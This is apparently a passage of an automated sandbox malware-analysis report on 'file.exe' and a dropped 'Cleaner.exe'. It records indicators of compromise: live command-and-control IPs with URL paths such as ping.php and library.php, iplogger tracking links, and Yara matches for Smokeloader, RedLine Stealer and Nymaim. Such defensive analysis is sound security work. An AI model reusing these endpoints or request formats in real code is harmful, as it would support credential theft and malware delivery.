00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, soft[1].0.dr	String found in binary or memory: https://g-cleanit.hk
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org
Source: file.exe, 00000000.00000003.345054992.0000000003940000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344736668.0000000003746000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315966725.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349013396.0000000003B83000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344047493.0000000003935000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343086335.0000000003B0D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.315735295.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316522296.0000000003248000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316150109.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.347627811.000000000374D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.342413106.0000000003927000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.349485189.000000000374C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.344369058.0000000003B27000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316216498.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316046017.0000000002F6E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.341121429.0000000003749000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.343503756.000000000374B000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.346281710.0000000003B4D000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.348412954.000000000396A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.316402159.00000000031F7000.00000004.00000800.00020000.00000000.sdmp, Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.org/1Pz8p7
Source: Cleaner.exe, 00000021.00000002.645456817.0000024B0040E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://iplogger.orgx
Source: Cleaner.exe, 00000021.00000002.640280019.0000024B00001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://take.rdrct-now.online/go/ZWKA?p78705p298845p1174

Source: unknown

DNS traffic detected: queries for: iplogger.org

Source: global traffic	HTTP traffic detected: GET /1Pz8p7 HTTP/1.1User-Agent: Mozilla/5.0 (Linux; Android 9; SM-G973U Build/PPR1.180610.011) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36Host: iplogger.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=start&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: DHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /software.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: EHost: 85.31.46.167Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /powfhxhxcjzx/ping.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 208.67.104.97Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.3:49723 version: TLS 1.2

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.30.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.710e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292406498.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.307333691.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.285914510.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265875582.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254096635.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.293499241.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.299464336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260403586.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.270306154.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.271549614.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261149123.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265067890.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.280355467.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.300281036.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.254941692.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.306082555.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.253262177.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.266126410.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.265250551.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.307807767.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.272012058.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.306274144.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.270474734.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.255218236.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.254552831.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.299589881.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.260586728.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.300504834.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.306335009.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.286527423.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.255136448.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.284886919.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.254427333.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.307684554.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.261493549.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.270666653.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.260670257.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.293688181.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.300426883.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.285114416.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.265318606.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.266050637.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.293620841.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.292559864.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.299699149.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.292621686.000000000078A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.286093708.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Binary is likely a compiled AutoIt script file

Source: file.exe, 00000000.00000003.348925452.0000000003B6E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: file.exe, 00000000.00000003.348371414.0000000003951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: soft[1].0.dr	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r

Uses 32bit PE files

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 00000000.00000000.261344459.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.271765385.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
